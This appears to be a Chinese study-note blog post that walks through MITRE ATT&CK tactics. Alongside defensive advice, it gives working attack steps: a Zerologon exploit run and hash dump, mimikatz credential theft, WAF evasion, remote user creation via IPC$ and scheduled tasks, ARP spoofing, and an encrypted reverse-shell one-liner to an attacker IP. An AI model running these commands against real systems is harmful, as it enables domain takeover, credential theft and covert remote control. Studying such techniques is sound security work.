MITRE ATT&CK超详细学习笔记-02(大量案例)
文章目录
- 1. 权限提升
-
- 1.1 系统内核溢出漏洞提权
- 1.2 NetLogon域内提权漏洞
- 2. 防御绕过
-
- 2.1 绕过WAF
-
- 2.1.1 使用代理池绕过
- 2.1.2 修改漏扫特征指纹
- 2.1.3 降低线程,扫描敏感度,使用流量代理转发,防止数据请求过多被墙
- 2.1.4 联动扫描流量转发,xray+bur
- 3. 凭证获取
-
- 3.1 提升权限 privilege::debug
- 3.2 读取密码 sekurlsa::logonpasswords
- 4.发现
- 5. 横向移动
-
- 5.1 建立ipc连接
- 5.2 给对方复制文件,添加进程任务
- 5.3 对方查看用户haha添加成功
- 6. 搜集
-
- 6.1 ARP欺骗
- 7. 命令控制
-
- 7.1 加密混淆
-
- 7.1.1 错误示范
- 7.1.2 正确示范——OpenSSL加密
- 8. 数据渗出
- 9. 影响
1. 权限提升
所有攻击者都会对权限提升爱不释手,利用系统漏洞获得root级访问权限是攻击者的核心目标之一。其中一些技术需要系统级的调用才能正确使用,Hooking和进程注入就是两个示例。
攻击者可能会利用软件漏洞来提升权限。当攻击者利用程序、服务或操作系统软件或内核本身中的编程错误来执行攻击者控制的代码时,就会利用软件漏洞。权限级别等安全结构通常会阻碍对信息的访问和某些技术的使用,因此攻击者可能需要执行权限升级以包括使用软件利用来规避这些限制。
下面会显示可用的提权exp以及exp的下载位置,不过在使用EXP时还需要注意影响的操作系统即版本,查看当前操作系统,可见是win7专业版SP1。
看下对应exp的影响系统范围即版本,并不是每个exp都有用,需多试几个exp(提权就是一个信息收集的过程,exp找对了就没什么问题)
1.1 系统内核溢出漏洞提权
系统内核溢出漏洞提权,这个提权方法是比较常用的方法。利用系统溢出漏洞进行提权的关键,是通过查看系统的补丁信息来找寻缺失的、可以利用来提权的补丁进行提权。
- 首先获取补丁信息,获取补丁信息
systeminfo | findstr KB
- 获取系统版本信息
systeminfo | findstr OS
- 将补丁信息复制,再去这个网站上看看寻找缺失的补丁以及提权exp,再利用—> 提权辅助网页 Windows提权辅助
网站地址为i.hacking8.com
下面会显示可用的提权exp以及exp的下载位置,不过在使用EXP时还需要注意影响的操作系统即版本,查看当前操作系统,可见是win7专业版SP1
看下对应exp的影响系统范围即版本,并不是每个exp都有用,需多试几个exp(提权就是一个信息收集的过程,exp找对了就没什么问题)
- 下载exp进行提权,这里下载CVE-2020-0787提权,运行exp,由普通用户成功提权为system权限
1.2 NetLogon域内提权漏洞
漏洞原理:Netlogon协议是微软提供的一套域访问认证协议,不同于大部分rpc服务,该协议使用的并不是典型的微软认证方式如NTLM\Kerberos,该协议的通信流程如图所示:
NetLogon认证过程大致如下:
client发送给server一个8字节的challenge
server发送给client一个8字节的challenge
双方通过计算生成session key,计算时所需的数据包括申请身份验证的用户的密码,还有client与server的challenge,简而言之,理论上说,如果不知道申请身份验证的用户的密码的话,是不可能得到正确的session key的。
客户端用session key与客户端自己的challenge运算生成一个client credential并发给服务端。
服务端用session key与服务端自己的challenge运算生成server credential并发给客户端,然后用客户端的challenge跟session key做运算,看是否跟客户端发过来的一样。如果一样则身份验证成功。
通过验证的核心:
是否有一个合法的client credential
漏洞点:
生成合法client credential需要用户的challenge及session key,攻击者能控制challenge。真实运算时本应在前面加上16字节的随机数,攻击者会在challenge前面加上16字节的0,那么和session key进行运算的数据就变成了全0。
虽然这个时候我们不知道session key 是多少,但我们知道运算后的credential是8字节(算法规定的不需要知道理由),且每个字节的数据都相同(因为每次都是与0做运算自然结果会相同),且第一个字节是0的概率是256分之1,因为一个字节是8位,可以表示0到255一共256个数,所以表示0的概率就是256分之1。综上,得到全0的client credential的概率是256分之1。
所以我们直接提交给服务端一个全0的client credential,就有256分之1的概率通过验证,又因为windows没有设置爆破防护机制,所以很快就能通过验证。
详细步骤:
-
修改文件impacket.dcerpc.v5.nrpc
需要利用https://github.com/SecureAuthCorp/impacket/edit/master/impacket/dcerpc/v5/nrpc.py文件替换本机上的nrpc文件。
本机nrpc文件存储路径为:C:\Users\Administrator\AppData\Local\Programs\Python\Python38\Lib\site-packages\impacket\dcerpc\v5\nrpc.py -
置空机器账户yukong$密码
python cve-2020-1472-exploit.py 机器账户名 ip
可以看到在第三个冒号后面显示的即为密码,为全0,表示密码被置空
其中获取对方机器账号或者netbios名的方式可使用net view。这个服务器名称带上 $ 就是机器名,例如list $ 或者yukong $
除此之外确定域控ip的方法有很多,例如:
查看开启53端口的主机
net time看回显会返回域控的主机名,然后ping即可
systeminfo命令查看域那块儿的值,ping一下就是域控的ip
看自己主机的dns -
读取administrator密码
python secretsdump.py test.com/[email protected] -no-pass
adminiatrator那一行第三个冒号后面就是原始的密码
- 下载目标的sam文件为下一步恢复机器密码做准备
get system.save
get sam.save
get security.save
下载了这三个文件
执行完成后可在wmiexec脚本所在的文件夹发现下载下来的文件:
然后通过导出 sam system 等文件到本地,获取域控机器上本地保存之前的 hash 值用于恢复,不然就脱域了
- 破解sam文件查看过去的机器密码
之后通过 sam.save、security.save、system.save 这些文件获得原来域控机器上的 Ntlm Hash 值,用于恢复密码:
保存红色圈中的密码,这个就是过去的机器密码,也就是aad3b435b51404eeaad3b435b51404ee:999699ceadecae87fef9a2040ef2213a。
- 重置密码yukong$机器密码
2. 防御绕过
防御绕过战术所拥有的技术是MITRE ATT&CK框架所有战术中最多的
该战术的一个有趣之处是某些恶意软件(例如勒索软件)对防御绕过毫不在乎。它们的唯一目标是在设备上执行一次,然后尽快被发现。一些技术可以骗过防病毒(AV)产品,让这些防病毒产品根本无法对其进行检测,或者绕过应用白名单技术。例如,禁用安全工具、文件删除和修改注册表都是可以利用的技术。当然,防守方可以通过监控终端上的更改并收集关键系统的日志,从而让入侵无处遁形。
2.1 绕过WAF
WAF就是Web Application Firewall。对于一些常规漏洞(如注入漏洞、XSS 漏洞、命令执行漏洞、文件包含漏洞)的检测大多是基于 “正则表达式” 和 “AI + 规则” 的方法,因此会有一定的概率绕过其防御。
安全狗具有防DDoS攻击的功能,打开cc拦截开关,扫描后发现,本地用目录扫描工具扫描后被拦截:
触发waf的因素:
通常被waf拦截因为触发了waf的规则,总结往往具备以下几点
1)漏扫线程过大被封禁
解决方法:延时,低线程,使用代理池,白名单扫描
2)工具指纹被waf识别被封禁
解决方法:指纹特征修改,模拟用户漏扫
3)漏洞单点payload特征被waf识别封禁
解决方法:数据变异绕过,多中工具集合扫描尝试
绕过的方式包括修改数据包特征和调整请求的速度
数据包特征包括对爬虫引擎进行伪造,伪造成为搜索引擎的爬虫信息
因为大部分waf会默认允许这些搜索引擎批量请求爬取信息,涉及到一个搜索结果排序的问题,如果不允许爬取(否则网站就垫底没人认识了…)
我们可以:
伪造user-agent头—UA头伪装为百度等搜索引擎爬虫的信息
常见的请求头如图
2.1.1 使用代理池绕过
可以自行搭建代理流量池,但是通常情况下效率很低,IP存活率也不高,这里还是推荐使用收费的代理,使用隧道代理,加大漏扫效率,使用代理记得将本地IP加入白名单,免密码验证使用代理。推荐使用隧道代理,加大效率。
2.1.2 修改漏扫特征指纹
例如修改awvs的代理头,使用爬虫引擎的数据头
AWVS是Acunetix Web Vulnerability Scanner的缩写。它是一个自动化的Web应用程序安全测试工具,审计检查漏洞。它可以扫描任何可通过Web浏览器访问的和遵循HTTP/HTTPS规则的Web站点和Web应用程序。可以通过检查SQL注入攻击漏洞、跨站脚本攻击漏洞等来审核Web应用程序的安全性。
2.1.3 降低线程,扫描敏感度,使用流量代理转发,防止数据请求过多被墙
2.1.4 联动扫描流量转发,xray+bur
单点的流量特征容易被识别,因此多种工具混合,还能提高漏扫效率
针对web层面的漏洞扫描,以及一些工具的联动使用提高效率,因为不同的对象需要使用不同类型的扫描,例如awvs针对国内的cms框架可能扫描的效率不是那么高,比较awvs是国外维护更新,所以在这种情况下并不是一款漏扫可以解决全部问题
代理模式下的基本架构为,扫描器作为中间人,首先原样转发流量,并返回服务器响应给浏览器等客户端,通讯两端都认为自己直接与对方对话,同时记录该流量,然后修改参数并重新发送请求进行扫描。
一般在实际测试中,除了需要手工在burp抓包改包之外,有时候可以配置一个多层代理,让请求包的数据从 Burp 转发到 xray 中,让xray协助进行检测,提高挖洞效率
bur设置代理将流量转发xray,xray监听扫描转发来的流量
Xray检测流量数据包
.\xray_windows_amd64.exe webscan --listen 127.0.0.1:7777 --html-output mniqi.html
流量走向: 模拟器app数据(192.168.181.1:8888)–>Burpsuite(监听 192.168.181.1:8888,转发流量127.0.0.1:8888)–>Xray(监听127.0.0.1:8888)
3. 凭证获取
毫无疑问,攻击者最想要的是凭证,尤其是管理凭证。如果攻击者可以合法登录,为什么要用0day或冒险采用漏洞入侵呢?这就犹如小偷进入房子,如果能够找到钥匙开门,没人会愿意砸破窗户进入。
任何攻击者入侵企业都希望保持一定程度的隐秘性。攻击者希望窃取尽可能多的凭证。当然,他们可以暴力破解,但这种攻击方式动静太大了。还有许多窃取哈希密码及哈希传递或离线破解哈希密码的示例。在所有要窃取的信息中,攻击者最喜欢的是窃取明文密码。明文密码可能存储在明文文件、数据库甚至注册表中。很常见的一种行为是,攻击者入侵一个系统窃取本地哈希密码,并破解本地管理员密码。
应对凭证访问最简单的办法就是采用复杂密码。建议使用大小写、数字和特殊字符组合,目的是让攻击者难以破解密码。最后需要监控有效账户的使用情况,因为在很多情况下,数据泄露是通过有效凭证发生的。面对凭证窃取最稳妥的办法就是启用多因素验证。即使存在针对双因素身份验证的攻击,有双因素身份验证(2FA)总比没有好。通过启用多因素验证,可以使想要破解密码的攻击者在访问环境中的关键数据时遇到更多的障碍。
3.1 提升权限 privilege::debug
通过debug获得mimikatz程序的特殊操作。
调试权限允许某人调试他们本来无法访问的进程。例如,作为用户运行的进程在其令牌上启用了调试权限,可以调试作为本地系统运行的服务。
当出现ERROR kuhl_m_privilege_simple ; RtlAdjustPrivilege (20) c0000061时,表示客户端未持有所需的权限,即不是管理员。
3.2 读取密码 sekurlsa::logonpasswords
这是win2012之前的版本,在windows2012以上的系统不能直接获取明文密码了,需要配置相关注册表等操作。
前面几行的Authentication … SID等值就是一些基本信息。
LAN Manager Challenge/Response"验证机制
msv:这项是账户对应密码的各种加密协议的密文,可以看到有LM、NTLM和SHA1加密的密文
tspkg,wdigest,kerberos:这个就是账户对应的明文密码了。有的时候这三个对应的也不是全部都是一样的,需要看服务器是什么角色。
SSP:是最新登录到其他RDP终端的账户和密码
4.发现
“发现”战术是一种难以防御的战术,主要目的是弄清网络环境。它与洛克希德•马丁网络Kill Chain的侦察阶段有很多相似之处。组织机构要正常运营业务,肯定会暴露某些特定方面的内容。
应对“发现”战术最常用的方法是应用白名单,这可以解决大多数恶意软件带来的问题。此外,欺骗防御也是一个很好的方法。部署一些虚假信息让攻击者发现,进而检测到攻击者的活动,并通过监控跟踪攻击者是否正在访问不应访问的文档。在日常工作中,组织机构的人员也会执行各种技术中所述的许多操作,因此,从各种干扰中筛选出恶意活动非常困难。理解哪些操作属于正常现象,并为预期行为设定基准,这会对检测发现战术下的技术有重要帮助。
攻击者攻陷服务器后,会尽可能去了解主机的相关信息,包括软件配置、管理员、网络配置等。这些信息能够帮助攻击者实现持久化、提权、横向移动等战术目标。而Windows系统内置的一些命令恰好可以用于了解这些信息,所以安全人员应该监控这些命令。但是这些内置命令行会经常被管理员、普通用户所使用,因此安全人员应该提前定义好白名单,以及采用相关安全产品进行异常检测,以便实时了解这些信息。常见的Windows命令包括hostname、ipconfig、net、quser、qwinsta、systeminfo、tasklist、dsquery、whoami等,通过这些内置命令,可以非常容易实现“发现”战术。
hostname看到主机名称,ipconfig看到IP的相关配置,quser可得到会话,qwinsta查看当前在线用户,systeminfo可以查看系统信息
为了有效区别恶意和善意活动,完整的命令行至关重要。并且,提供关于父进程的信息更有助于做出决策并根据环境做出调整。
通过监控进程创建的日志内容,可以跟踪用户是否正在执行内置命令
5. 横向移动
攻击者在利用单个系统漏洞后,通常会尝试在网络内进行横向移动。甚至,针对单个系统的勒索软件也试图在网络中进行横向移动以寻找其他攻击目标。攻击者通常会先寻找一个落脚点,然后开始在各个系统中移动,寻找更高的访问权限,以期达成最终目标。
在拿下一台内网主机后,通过本地信息搜集收集用户凭证等信息后,如何横向渗透拿下更多的主机?
此处介绍 at&schtasks 命令的使用,在已知目标系统的用户明文密码的基础上,直接可以在远程主机上执行命令。
获取到某域主机权限->minikatz 得到密码(明文,hash)->用到信息收集里面域用户的列表当做用户名字典->用到密码明文当做密码字典->尝试连接->创建计划任务(at|schtasks)
->执行文件可为后门或者相关命令
at传递:
对于at命令需要对方主机低于win2012在已知目标系统的用户明文密码的基础上,直接可以在远程主机上执行命令。首先at,sc协议需要有139/445端口的开放,一般主机都会开启。没有开启就采用其他的移动方式。
5.1 建立ipc连接
net use \192.168.213.163\ipc$ “123.com” /user:hsyy.com\administrator
IPC(Internet Process Connection)是共享"命名管道"的资源,它是为了让进程间通信而开放的命名管道,可以通过验证用户名和密码获得相应的权限,在远程管理计算机和查看计算机的共享资源时使用。
5.2 给对方复制文件,添加进程任务
本地制作user.bat文件放在本地c盘执行命令脚本:net user haha 123.com /add
将文件上传到对方主机C 盘:copy user.bat \192.168.213.163\c$
给对方主机添加命令执行任务:at \192.168.213.163 12:20 c:\user.bat
5.3 对方查看用户haha添加成功
6. 搜集
攻击者会尝试窃取用户的信息,包括屏幕上有什么内容、用户在输入什么内容、用户讨论的内容及用户的特征。除此之外,攻击者还会寻找本地系统上的敏感数据及网络上的其他数据。这就要求安全人员了解企业存储敏感数据的位置,并采用适当的控制措施加以保护。这个过程遵循CIS控制措施14——基于需要了解受控访问,通过该措施可以有效防止数据落入敌手。对于极其敏感的数据,可查看更多的日志记录,了解哪些人正在访问该数据,以及他们正在使用该数据做什么。
收集包括攻击者可能用来收集信息的技术,以及收集与跟踪攻击者目标相关的来源信息。通常,收集数据后的下一个目标是窃取(泄露)数据。常见的目标源包括各种驱动器类型、浏览器、音频、视频和电子邮件。常见的收集方法包括捕获屏幕截图和键盘输入。
Windows允许使用服务器消息块(SMB)协议通过端口445/TCP共享文件、管道和打印机。SMB还允许通过远程计算机列出、读取及写入共享文件。通过SMB获取数据这一做法,属于ATT&CK框架中远程网络共享驱动数据攻击技术。仔细监控SMB活动,有助于安全人员了解威胁态势,从而检测到攻击者的非正常活动。
尽管可能有很多本地方法来检测主机上详细的SMB事件,但也可以从网络流量中提取相关信息。使用正确的协议解码器,可以过滤端口445的流量,甚至可以检索文件路径。下面这段伪代码可以从网络流量中提取SMB相关的信息。
6.1 ARP欺骗
简而言之,就是骗取受害主机误认为是网关,然后把流量数据发给攻击方,攻击方可以截获流量数据。
攻击条件:
攻击方要知道被攻击方的IP地址,以及被攻击方的网关地址
攻击方和被攻击方处于同一局域网下
- 使用Kali中的Ettercap
- 点击搜索,将A主机和B主机加入到target中
- 点击右上角,选择ARP poisoning;选择sniff remote connections
可以看到两个受害IP被加入群组
进行ARP欺骗后的目标机物理地址状态
打开网站(注意:这里是的网站是在Windows系统下的浏览器,也就是目标物理机的浏览器,不是在虚拟机上的网站),输入账号密码
7. 命令控制
现在大多数恶意软件都有一定程度使用命令与控制战术。攻击者可以通过命令与控制服务器来接收数据,并告诉恶意软件下一步执行什么指令。对于每一种命令与控制,攻击者都是从远程位置访问网络。
命令和控制包括攻击者可以用来与受害网络中受其控制的系统进行通信的技术。攻击者通常会尝试模仿正常的、预期的流量来避免检测。根据受害者的网络结构和防御,对手可以通过多种方式建立具有不同隐身级别的指挥和控制。
攻击者可能会混淆命令和控制流量,试图使内容更难被发现或破译,并使通信不那么显眼并隐藏命令不被看到。这包括许多方法,例如将垃圾数据添加到协议流量、使用隐写术或冒充合法协议。
7.1 加密混淆
红队进行渗透测试的后续渗透阶段为了扩大战果,往往需要横行渗透,反弹 shell,如果反弹 shell 都是明文传输,未加密的流量使用 wireshark 等工具抓包分析可以直接看到输入的命令和返回的信息,而且内网中 IDS 或者防护软件会进行流量进行分析,检测带有攻击特征,很容易被发现,如果蓝队对攻击流量回溯分析,就可以复现攻击的过程。此时红队攻击就会暴漏出来,整个项目都要停止
7.1.1 错误示范
先来一个错误示范,看看未经加密的流量状态
这里使用的 bash 反弹shell,适用于 linux 系统,无需安装
分析流量,看 tcp 流量就可以了,右击选择追踪流,可以看到执行的命令
前提:已经进入了后渗透阶段,因此环境中是已经拿到受害者权限
- 攻击者使用nc监听反弹端口
- 在受害者机器上执行反弹shell命令,此处bash反弹
- 连接成功后使用kali默认安装的wireshark嗅探流量
抓取到的发现全是明文,可以看到执行的命令
7.1.2 正确示范——OpenSSL加密
在计算机网络上,OpenSSL 是一个开放源代码的软件库包,应用程序可以使用这个包来进行安全通信,避免窃听,同时确认另一端连接者的身份。这个包广泛被应用在互联网的网页服务器上
mkfifo 是一个创建命令管道的函数
什么是命名管道
命名管道也被称为FIFO文件,它是一种特殊类型的文件,它在文件系统中以文件名的形式存在,但是它的行为却和之前所讲的没有名字的管道(匿名管道)类似。
由于Linux中所有的事物都可被视为文件,所以对命名管道的使用也就变得与文件操作非常的统一,也使它的使用非常方便,同时我们也可以像平常的文件名一样在命令中使用
- 攻击机使用 OpenSSL 生成自签名证书
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
- 攻击机监听端口
openssl s_server -quiet -key key.pem -cert cert.pem -port 8080
- 目标机器(受害者)执行反弹 shell 命令
mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect
192.168.179.134:8080 > /tmp/s; rm /tmp/s
# IP为攻击者IP,端口为监听端口
再次抓取发现是密文乱码
8. 数据渗出
攻击者获得访问权限后,会四处搜寻相关数据,然后开始着手进行数据窃取,但并不是所有恶意软件都能到达这个阶段。例如,勒索软件通常对窃取数据没有兴趣。
在攻击者通过网络窃取数据的情况下,尤其是窃取大量数据(如客户数据库)时,建立网络入侵检测或防预系统有助于识别数据何时被传输。
如果组织机构要处理高度敏感的数据,那么应重点限制外部驱动器的访问权限(例如USB接口),限制其对文件的访问权限,比如,可以禁用装载外部驱动器的功能。要正确地应对这个战术,首先需要知道组织机构关键数据所在的位置。如果这些数据还在,可以按照CIS控制措施14——基于需要了解受控访问,来确保数据安全。之后,按照CIS控制措施13——数据保护中的说明,了解如何监控用户访问数据的情况。
001攻击者可能会将数据泄露到代码存储库,而不是通过他们的主要命令和控制通道。代码存储库通常可以通过 API 访问(例如:https://api.github.com)。对这些 API 的访问通常通过 HTTPS 进行,这为攻击者提供了额外的保护级别。
002攻击者可能会将数据泄露到云存储服务,而不是通过他们的主要命令和控制通道。云存储服务允许通过 Internet 从远程云存储服务器存储、编辑和检索数据。
在攻击者将收集的数据传输出去之前,很有可能会创建一个压缩文档,以便最大限度地缩短传输时间并减少文件传输量。除了查找RAR或7z程序名称,还可以使用* a *来检测7Zip或RAR的命令行用法。因为攻击者可能会更改程序名称所以这一步也很有帮助。攻击者在窃取大量数据(如客户数据库)的情况下,通常会使用数据压缩来减少传输时间,从而更加迅速地完成数据窃取。
有很多种工具可以用来压缩数据,但是,应该监控命令行和文档压缩工具的上下文,例如ZIP、RAR和7ZIP。
在检测相关的数据压缩软件时,可以分析查找RAR是否使用了命令行参数a,但是,可能有其他程序将此作为合法参数,这需要过滤掉。
9. 影响
攻击者试图操纵、中断或破坏企业的系统和数据。用于“危害”的技术包括破坏或篡改数据。在某些情况下,业务流程看起来很好,但可能数据已经被攻击者篡改了。这些技术可能被攻击者用来完成他们的最终目标,或者为其窃取机密提供掩护。例如,攻击者可能破坏特定系统数据和文件,从而中断系统服务和网络资源的可用性。数据销毁可能会覆盖本地或远程驱动器上的文件或数据,使这些数据无法恢复。针对这类破坏,可以考虑实施IT灾难恢复计划,其中包含用于还原组织数据的常规数据备份过程。